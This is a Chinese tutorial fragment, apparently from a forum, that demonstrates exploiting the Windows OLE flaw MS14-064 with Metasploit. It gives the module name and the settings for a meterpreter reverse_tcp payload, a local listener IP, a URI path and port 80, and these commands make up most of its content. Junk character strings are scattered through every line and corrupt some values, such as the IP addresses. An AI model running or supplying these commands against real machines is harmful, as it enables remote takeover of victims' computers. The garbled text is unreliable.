! k) r1 v K" v4 p! T 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示+ j. [$ h9 e$ f, S( o) a
' r5 x7 R: W/ q L0 b2 l | A
$ h7 i8 i+ B: D O" f v 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
( D) K7 y6 m: H3 n7 r5 }1 H
; g4 O) r5 i* h. C$ ^" l. B7 I$ `$ _3 F0 V/ X+ q4 W; g! _
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
% y* t7 n' d: m# J3 B6 K$ e j
# k' { p& ^# {, a3 U* S- ~6 K* K+ B2 Y$ l8 W
set AllowPowershellPrompt true' J6 e# w4 \2 l$ k
. d; c. `4 i5 j) z" Z
! b. D! V9 M: w/ L- `( C) F Set LHOST 192.168.0.1093 H/ a' S! P& e( [0 l# C1 N$ J* F
, X1 r# n1 U6 V k/ x& @* t# N( p1 g. c
set SRVHOST 192.168.0.1097 L5 d8 \" \3 [3 S' J
5 s( z7 r, c/ o3 H! Q A/ a, h# N3 ~
Set uripath share! E' h! U9 H3 D3 M% P% p
$ k2 G$ @# J: h% v9 N4 v5 i( z: K: f7 e; P5 \& @/ U
Set srvport 80
4 E' \. @, e: @" m) k; T
6 P) Q3 _( g9 \- {( k
/ }% P. c" i& C( h+ A
( w. F9 y+ V* }* ?6 @0 G
4 W, n' U9 S. I9 P
1 }8 v; p! e9 y- Z$ `" R
! d& u6 R* V2 I9 s( A# ~
5 N1 P# @2 v! F3 A
' g" k5 v d5 I+ c3 S3 m; I $ L# r! w9 g, _" A
. O, Y' d8 X, |6 c) X( L5 t& A2 [1 R+ Z
5 L* S# d, u: r0 [
) |) M, w o7 w! r1 i
4 E, b+ W7 F/ l3 O) J ; c4 F& S8 G/ b3 W# V
* a" v, y( K, ?. Y
1 F6 F3 s9 U: O: X 下面我们来访问本地地址如图:
9 i" n! B5 t6 Q4 g5 r2 i
5 O' @: X3 y- l2 M, T
/ g) g$ W$ j+ v9 R: ]
`% r3 t3 A1 [) ~
! V: }) [% b& F l% k! P
* @/ K, C* s' U. ^: w 7 B* S0 N% L+ _8 A% A
) f$ m# {1 I$ k: n l
2 E; f4 F; E4 [( I
$ _) a; m1 ~8 A# q% Z